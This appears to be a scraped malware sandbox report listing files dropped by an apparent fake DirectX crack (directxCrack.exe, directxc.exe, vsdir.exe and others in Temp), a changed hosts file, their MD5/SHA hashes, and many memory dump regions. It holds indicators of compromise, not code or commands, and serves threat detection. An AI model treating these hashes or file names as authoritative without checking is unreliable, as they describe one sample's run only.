39d7aead40f62566713de4ad6f430c06973fda6da972748f982a3d75f23715a9

SHA512
04864f3c6d4447694d4d4e4d5722302b13a41827d33fd3390fdc2e2c5f3dc8169bab0781099c79f0cb7b6af6d0b4870a3b226ab92ef37b62cca0aa86e00f4186

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxCrack.exe
Filesize
95KB

MD5
af8a3a1cb685f9e1fdcc970bd4ca420f

SHA1
9342d6f660df293516c2932c905fe4411474e321

SHA256
39d7aead40f62566713de4ad6f430c06973fda6da972748f982a3d75f23715a9

SHA512
04864f3c6d4447694d4d4e4d5722302b13a41827d33fd3390fdc2e2c5f3dc8169bab0781099c79f0cb7b6af6d0b4870a3b226ab92ef37b62cca0aa86e00f4186

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxERR.exe
Filesize
277KB

MD5
42b2f41288903b76cdcd4f585e0e35f6

SHA1
d33b5b2b66329c117c307a6208c13ec3745cd662

SHA256
27570a564eb0a836e5ec6b9dc8fe941d3c3f98238b8e4a1c816d076ea3dc1f67

SHA512
c1120e2b55a753187ebedd6022a32fd6aea9b41536da5b1670da18402fd6c1b747fc1e4e051e1edf13f61e391ad38183f3a9f0431ca36a6e2754f1230126ae2f

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxERR.exe
Filesize
277KB

MD5
42b2f41288903b76cdcd4f585e0e35f6

SHA1
d33b5b2b66329c117c307a6208c13ec3745cd662

SHA256
27570a564eb0a836e5ec6b9dc8fe941d3c3f98238b8e4a1c816d076ea3dc1f67

SHA512
c1120e2b55a753187ebedd6022a32fd6aea9b41536da5b1670da18402fd6c1b747fc1e4e051e1edf13f61e391ad38183f3a9f0431ca36a6e2754f1230126ae2f

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxERR.exe
Filesize
277KB

MD5
42b2f41288903b76cdcd4f585e0e35f6

SHA1
d33b5b2b66329c117c307a6208c13ec3745cd662

SHA256
27570a564eb0a836e5ec6b9dc8fe941d3c3f98238b8e4a1c816d076ea3dc1f67

SHA512
c1120e2b55a753187ebedd6022a32fd6aea9b41536da5b1670da18402fd6c1b747fc1e4e051e1edf13f61e391ad38183f3a9f0431ca36a6e2754f1230126ae2f

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxMer.exe
Filesize
111KB

MD5
dab5342d0d566bc7d80e1cc11459912e

SHA1
7cd1a45da9458278571b13f08b28f607093e1225

SHA256
fa6ed407a949b1da6c2123ef67ef53280c4bb02bde373c62cad3ae228b5a4dd1

SHA512
0ccb2bc126d3a9e4af8cc022d93db95a9b542beb488bc23f55ade60cf7a5437657a9a0095cb4b8f56408fb75eddcb8d80a1c7ba2e658a889c57762d8d3f77d72

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxMer.exe
Filesize
111KB

MD5
dab5342d0d566bc7d80e1cc11459912e

SHA1
7cd1a45da9458278571b13f08b28f607093e1225

SHA256
fa6ed407a949b1da6c2123ef67ef53280c4bb02bde373c62cad3ae228b5a4dd1

SHA512
0ccb2bc126d3a9e4af8cc022d93db95a9b542beb488bc23f55ade60cf7a5437657a9a0095cb4b8f56408fb75eddcb8d80a1c7ba2e658a889c57762d8d3f77d72

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxMer.exe
Filesize
111KB

MD5
dab5342d0d566bc7d80e1cc11459912e

SHA1
7cd1a45da9458278571b13f08b28f607093e1225

SHA256
fa6ed407a949b1da6c2123ef67ef53280c4bb02bde373c62cad3ae228b5a4dd1

SHA512
0ccb2bc126d3a9e4af8cc022d93db95a9b542beb488bc23f55ade60cf7a5437657a9a0095cb4b8f56408fb75eddcb8d80a1c7ba2e658a889c57762d8d3f77d72

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxUp.exe
Filesize
275KB

MD5
ff678c98945b8e1dfd7c84220ff47c84

SHA1
f7d26121e132d81d5f1a12f175ced8a43ec330cd

SHA256
71d49cfce7fdbc7f1d16b906bb3c8534fea6c490590628137c4d7e42046733f2

SHA512
175bee2c1c39d6633095f527578601f361c2de5db368bd4798ad06000bb69ed41930da6e4c7688bfff2277d7c3887b88711a084bafec9aa96585ca0536bd04fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxUp.exe
Filesize
275KB

MD5
ff678c98945b8e1dfd7c84220ff47c84

SHA1
f7d26121e132d81d5f1a12f175ced8a43ec330cd

SHA256
71d49cfce7fdbc7f1d16b906bb3c8534fea6c490590628137c4d7e42046733f2

SHA512
175bee2c1c39d6633095f527578601f361c2de5db368bd4798ad06000bb69ed41930da6e4c7688bfff2277d7c3887b88711a084bafec9aa96585ca0536bd04fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxUp.exe
Filesize
275KB

MD5
ff678c98945b8e1dfd7c84220ff47c84

SHA1
f7d26121e132d81d5f1a12f175ced8a43ec330cd

SHA256
71d49cfce7fdbc7f1d16b906bb3c8534fea6c490590628137c4d7e42046733f2

SHA512
175bee2c1c39d6633095f527578601f361c2de5db368bd4798ad06000bb69ed41930da6e4c7688bfff2277d7c3887b88711a084bafec9aa96585ca0536bd04fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxc.exe
Filesize
3.7MB

MD5
2633b7825a18e339d1c339a2475906e6

SHA1
a21077a1e5a72b9d8f9d4011d4b0cc659daf9cc8

SHA256
a3576399f5fb369a3ecbbabf804c4e8950eaccea304949eae965f2cf28e0219f

SHA512
14bd8873dbc3dd86bf743fa7927ec5adf9d4e78704181f33f849ef7c5d257588a3d96f2198b19d0fd69f5a7da67c3b610f37ceb8ec6e58da85df07be12025739

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxc.exe
Filesize
3.7MB

MD5
2633b7825a18e339d1c339a2475906e6

SHA1
a21077a1e5a72b9d8f9d4011d4b0cc659daf9cc8

SHA256
a3576399f5fb369a3ecbbabf804c4e8950eaccea304949eae965f2cf28e0219f

SHA512
14bd8873dbc3dd86bf743fa7927ec5adf9d4e78704181f33f849ef7c5d257588a3d96f2198b19d0fd69f5a7da67c3b610f37ceb8ec6e58da85df07be12025739

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxc.exe
Filesize
3.7MB

MD5
2633b7825a18e339d1c339a2475906e6

SHA1
a21077a1e5a72b9d8f9d4011d4b0cc659daf9cc8

SHA256
a3576399f5fb369a3ecbbabf804c4e8950eaccea304949eae965f2cf28e0219f

SHA512
14bd8873dbc3dd86bf743fa7927ec5adf9d4e78704181f33f849ef7c5d257588a3d96f2198b19d0fd69f5a7da67c3b610f37ceb8ec6e58da85df07be12025739

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxw.exe
Filesize
8.4MB

MD5
fcc4014be0904e1cfa6939912db2a1b0

SHA1
224947f2dc32e111bcd74a7eb4655f512c52f906

SHA256
a6f580ad9b771d64c018acc1c804e68089d33eb394ff06adb1df59e8f33ed7b1

SHA512
a3fda3c8257f466e47d3be243dae3529207f77e4e28a4ee3d33c74072646305a8202f6130b96a1f235506cf27b33e0922c8d385a040bcbe1b389de46fd9ac685

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxw.exe
Filesize
8.4MB

MD5
fcc4014be0904e1cfa6939912db2a1b0

SHA1
224947f2dc32e111bcd74a7eb4655f512c52f906

SHA256
a6f580ad9b771d64c018acc1c804e68089d33eb394ff06adb1df59e8f33ed7b1

SHA512
a3fda3c8257f466e47d3be243dae3529207f77e4e28a4ee3d33c74072646305a8202f6130b96a1f235506cf27b33e0922c8d385a040bcbe1b389de46fd9ac685

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxw.exe
Filesize
8.4MB

MD5
fcc4014be0904e1cfa6939912db2a1b0

SHA1
224947f2dc32e111bcd74a7eb4655f512c52f906

SHA256
a6f580ad9b771d64c018acc1c804e68089d33eb394ff06adb1df59e8f33ed7b1

SHA512
a3fda3c8257f466e47d3be243dae3529207f77e4e28a4ee3d33c74072646305a8202f6130b96a1f235506cf27b33e0922c8d385a040bcbe1b389de46fd9ac685

Download Submit
C:\Users\Admin\AppData\Local\Temp\vsdir.exe
Filesize
275KB

MD5
8cfab25b120e5e4e990382c01a43debd

SHA1
e4489fa4ea392827129d53da90dd2434f2117f2e

SHA256
ec3ee2972f9988a438cf265c60ee86d4d59571306b86554bca11cd31c14abe56

SHA512
61099e61cf66a991137db126d8d1fd096ab585f6013162d73a5b76cf2bfbb64b1a4bc390ca606d8f6e5a32882267ce429b533881ab17826aa3e662a64cb4c599

Download Submit
C:\Users\Admin\AppData\Local\Temp\vsdir.exe
Filesize
275KB

MD5
8cfab25b120e5e4e990382c01a43debd

SHA1
e4489fa4ea392827129d53da90dd2434f2117f2e

SHA256
ec3ee2972f9988a438cf265c60ee86d4d59571306b86554bca11cd31c14abe56

SHA512
61099e61cf66a991137db126d8d1fd096ab585f6013162d73a5b76cf2bfbb64b1a4bc390ca606d8f6e5a32882267ce429b533881ab17826aa3e662a64cb4c599

Download Submit
C:\Users\Admin\AppData\Local\Temp\vsdir.exe
Filesize
275KB

MD5
8cfab25b120e5e4e990382c01a43debd

SHA1
e4489fa4ea392827129d53da90dd2434f2117f2e

SHA256
ec3ee2972f9988a438cf265c60ee86d4d59571306b86554bca11cd31c14abe56

SHA512
61099e61cf66a991137db126d8d1fd096ab585f6013162d73a5b76cf2bfbb64b1a4bc390ca606d8f6e5a32882267ce429b533881ab17826aa3e662a64cb4c599

Download Submit
C:\Windows\System32\drivers\etc\hosts
Filesize
3KB

MD5
2d29fd3ae57f422e2b2121141dc82253

SHA1
c2464c857779c0ab4f5e766f5028fcc651a6c6b7

SHA256
80a60d7ec533d820de20bcedeb41319e7b1def548b6ea73ddbd69455bac4e7a4

SHA512
077a5c554663be7b71f181d961f5c98c732bc296dc015ffee30768a648bee3aad62c39c352cf2947432be19519906aeac7dfaf2557d309bb460732abb7fdbc68

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
memory/376-455-0x000001EC3E3D0000-0x000001EC3E3F7000-memory.dmp

Filesize
156KB

Download
memory/604-443-0x000002D5FB780000-0x000002D5FB7A1000-memory.dmp

Filesize
132KB

Download
memory/688-450-0x00007FFF57570000-0x00007FFF57580000-memory.dmp

Filesize
64KB

Download
memory/688-448-0x000001F269A80000-0x000001F269AA7000-memory.dmp

Filesize
156KB

Download
memory/972-458-0x00007FFF57570000-0x00007FFF57580000-memory.dmp

Filesize
64KB

Download
memory/972-454-0x0000017DD96D0000-0x0000017DD96F7000-memory.dmp

Filesize
156KB

Download
memory/1080-1-0x0000000000400000-0x000000000273B000-memory.dmp

Filesize
35.2MB

Download
memory/1080-104-0x0000000000400000-0x000000000273B000-memory.dmp

Filesize
35.2MB

Download
memory/1080-2-0x0000000000400000-0x000000000273B000-memory.dmp

Filesize
35.2MB

Download
memory/1080-0-0x00000000028A0000-0x00000000028A1000-memory.dmp

Filesize
4KB

Download
memory/1232-163-0x00000000004E0000-0x0000000000527000-memory.dmp

Filesize
284KB

Download
memory/1828-99-0x0000000000710000-0x0000000000757000-memory.dmp

Filesize
284KB

Download
memory/1828-108-0x0000000000710000-0x0000000000757000-memory.dmp

Filesize
284KB

Download
memory/2112-321-0x00007FF6F18E0000-0x00007FF6F1C9F000-memory.dmp

Filesize
3.7MB

Download
memory/2112-302-0x00007FF6F18E0000-0x00007FF6F1C9F000-memory.dmp

Filesize
3.7MB

Download
memory/2112-197-0x00007FF6F18E0000-0x00007FF6F1C9F000-memory.dmp

Filesize
3.7MB

Download
memory/2196-129-0x0000000000400000-0x0000000000430000-memory.dmp

Filesize
192KB

Download
memory/2196-143-0x0000000073EA0000-0x0000000074650000-memory.dmp

Filesize
7.7MB

Download
memory/2196-160-0x0000000002B30000-0x0000000002B40000-memory.dmp

Filesize
64KB

Download
memory/2228-150-0x00000000014F0000-0x00000000014F1000-memory.dmp

Filesize
4KB

Download
memory/2228-155-0x0000000001510000-0x0000000001511000-memory.dmp

Filesize
4KB

Download
memory/2228-146-0x0000000001380000-0x0000000001381000-memory.dmp

Filesize
4KB

Download
memory/2228-148-0x0000000000400000-0x000000000132A000-memory.dmp

Filesize
15.2MB

Download
memory/2228-149-0x00000000014C0000-0x00000000014C1000-memory.dmp

Filesize
4KB

Download
memory/2228-147-0x0000000001390000-0x0000000001391000-memory.dmp

Filesize
4KB

Download
memory/2228-159-0x0000000001520000-0x0000000001521000-memory.dmp

Filesize
4KB

Download
memory/2228-153-0x0000000000400000-0x000000000132A000-memory.dmp

Filesize
15.2MB

Download
memory/2228-152-0x0000000001500000-0x0000000001501000-memory.dmp

Filesize
4KB

Download
memory/2608-124-0x0000000006470000-0x00000000067C4000-memory.dmp

Filesize
3.3MB

Download
memory/2608-218-0x0000000007C70000-0x0000000007C8A000-memory.dmp

Filesize
104KB

Download
memory/2608-72-0x0000000001770000-0x0000000001780000-memory.dmp

Filesize
64KB

Download
memory/2608-212-0x0000000006EF0000-0x0000000006F0E000-memory.dmp

Filesize
120KB

Download
memory/2608-44-0x0000000003350000-0x0000000003386000-memory.dmp

Filesize
216KB

Download
memory/2608-200-0x000000007F6B0000-0x000000007F6C0000-memory.dmp

Filesize
64KB

Download
memory/2608-167-0x0000000001770000-0x0000000001780000-memory.dmp

Filesize
64KB

Download
memory/2608-202-0x00000000747A0000-0x00000000747EC000-memory.dmp

Filesize
304KB

Download
memory/2608-201-0x0000000007AE0000-0x0000000007B12000-memory.dmp

Filesize
200KB

Download
memory/2608-157-0x0000000073EA0000-0x0000000074650000-memory.dmp

Filesize
7.7MB

Download
memory/2608-87-0x0000000001770000-0x0000000001780000-memory.dmp

Filesize
64KB

Download
memory/2608-66-0x0000000005AF0000-0x0000000006118000-memory.dmp

Filesize
6.2MB

Download
memory/2608-102-0x0000000005960000-0x0000000005982000-memory.dmp

Filesize
136KB

Download
memory/2608-114-0x0000000006290000-0x00000000062F6000-memory.dmp

Filesize
408KB

Download
memory/2608-199-0x0000000001770000-0x0000000001780000-memory.dmp

Filesize
64KB

Download
memory/2608-120-0x0000000006400000-0x0000000006466000-memory.dmp

Filesize
408KB

Download
memory/2608-213-0x0000000007B20000-0x0000000007BC3000-memory.dmp

Filesize
652KB

Download
memory/2608-177-0x0000000006920000-0x000000000693E000-memory.dmp

Filesize
120KB

Download
memory/2608-219-0x0000000007CE0000-0x0000000007CEA000-memory.dmp

Filesize
40KB

Download
memory/2608-57-0x0000000073EA0000-0x0000000074650000-memory.dmp

Filesize
7.7MB

Download
memory/2608-214-0x00000000082B0000-0x000000000892A000-memory.dmp

Filesize
6.5MB

Download
memory/3068-81-0x0000000073EA0000-0x0000000074650000-memory.dmp

Filesize
7.7MB

Download
memory/3068-166-0x0000000073EA0000-0x0000000074650000-memory.dmp

Filesize
7.7MB

Download
memory/3068-59-0x0000000000730000-0x0000000000752000-memory.dmp

Filesize
136KB

Download
memory/3092-428-0x00007FFF974F0000-0x00007FFF976E5000-memory.dmp

Filesize
2.0MB

Download
memory/3092-429-0x00007FFF95C20000-0x00007FFF95CDE000-memory.dmp

Filesize
760KB

Download
memory/3452-335-0x00007FF721BF0000-0x00007FF721C19000-memory.dmp

Filesize
164KB

Download
memory/3524-216-0x0000000073EA0000-0x0000000074650000-memory.dmp

Filesize
7.7MB

Download
memory/3524-119-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/3524-141-0x00000000057A0000-0x00000000057B0000-memory.dmp

Filesize
64KB

Download
memory/3524-215-0x00000000057A0000-0x00000000057B0000-memory.dmp

Filesize
64KB

Download
memory/3524-139-0x0000000073EA0000-0x0000000074650000-memory.dmp

Filesize
7.7MB

Download
memory/3684-142-0x0000000000F30000-0x0000000000F77000-memory.dmp

Filesize
284KB

Download
memory/3684-126-0x0000000000F30000-0x0000000000F77000-memory.dmp

Filesize
284KB

Download
memory/3808-164-0x0000000073EA0000-0x0000000074650000-memory.dmp

Filesize
7.7MB

Download
memory/3808-67-0x00000000049B0000-0x0000000004A4C000-memory.dmp

Filesize
624KB

Download
memory/3808-65-0x00000000000C0000-0x00000000000DE000-memory.dmp

Filesize
120KB

Download
memory/3808-69-0x0000000073EA0000-0x0000000074650000-memory.dmp

Filesize
7.7MB

Download
memory/4216-137-0x0000000000400000-0x0000000000448000-memory.dmp

Filesize
288KB

Download
memory/4216-107-0x0000000000400000-0x0000000000448000-memory.dmp

Filesize
288KB

Download
memory/4236-140-0x00000000057E0000-0x000000000581C000-memory.dmp

Filesize
240KB

Download
memory/4236-133-0x0000000005780000-0x0000000005792000-memory.dmp

Filesize
72KB

Download
memory/4236-128-0x0000000005850000-0x000000000595A000-memory.dmp

Filesize
1.0MB

Download
memory/4236-135-0x0000000005B10000-0x0000000005B20000-memory.dmp

Filesize
64KB

Download
memory/4236-175-0x0000000073EA0000-0x0000000074650000-memory.dmp

Filesize
7.7MB

Download
memory/4236-123-0x0000000005D00000-0x0000000006318000-memory.dmp

Filesize
6.1MB

Download
memory/4236-144-0x0000000005960000-0x00000000059AC000-memory.dmp

Filesize
304KB

Download
memory/4236-121-0x0000000073EA0000-0x0000000074650000-memory.dmp

Filesize
7.7MB

Download
memory/4236-100-0x0000000000400000-0x0000000000430000-memory.dmp

Filesize
192KB

Download
memory/4236-198-0x0000000005B10000-0x0000000005B20000-memory.dmp

Filesize
64KB

Download
memory/4312-151-0x0000000000430000-0x0000000000460000-memory.dmp

Filesize
192KB

Download
memory/4312-168-0x0000000073EA0000-0x0000000074650000-memory.dmp

Filesize
7.7MB

Download
memory/4344-172-0x0000000004D80000-0x0000000004D90000-memory.dmp

Filesize
64KB

Download
memory/4344-171-0x0000000004D80000-0x0000000004D90000-memory.dmp

Filesize
64KB

Download
memory/4344-217-0x0000000004D80000-0x0000000004D90000-memory.dmp

Filesize
64KB

Download
memory/4344-170-0x0000000073EA0000-0x0000000074650000-memory.dmp

Filesize
7.7MB

Download
memory/4348-301-0x0000000000860000-0x0000000000BE4000-memory.dmp

Filesize
3.5MB

Download
memory/4348-18-0x0000000000860000-0x0000000000BE4000-memory.dmp

Filesize
3.5MB

Download
memory/4348-145-0x0000000000860000-0x0000000000BE4000-memory.dmp

Filesize
3.5MB

Download
memory/4348-196-0x0000000000860000-0x0000000000BE4000-memory.dmp

Filesize
3.5MB

Download
memory/4348-413-0x0000000000860000-0x0000000000BE4000-memory.dmp

Filesize
3.5MB

Download
memory/4840-176-0x0000000073EA0000-0x0000000074650000-memory.dmp

Filesize
7.7MB

Download
memory/4840-174-0x00000000051A0000-0x00000000051B0000-memory.dmp

Filesize
64KB

Download
memory/4840-173-0x00000000051A0000-0x00000000051B0000-memory.dmp

Filesize
64KB

Download
memory/4964-452-0x00007FF6FE740000-0x00007FF6FEAFF000-memory.dmp

Filesize
3.7MB

Download
memory/5036-440-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/5036-437-0x00007FFF95C20000-0x00007FFF95CDE000-memory.dmp

Filesize
760KB

Download
memory/5036-436-0x00007FFF974F0000-0x00007FFF976E5000-memory.dmp

Filesize
2.0MB

Download
memory/5036-435-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/5036-430-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download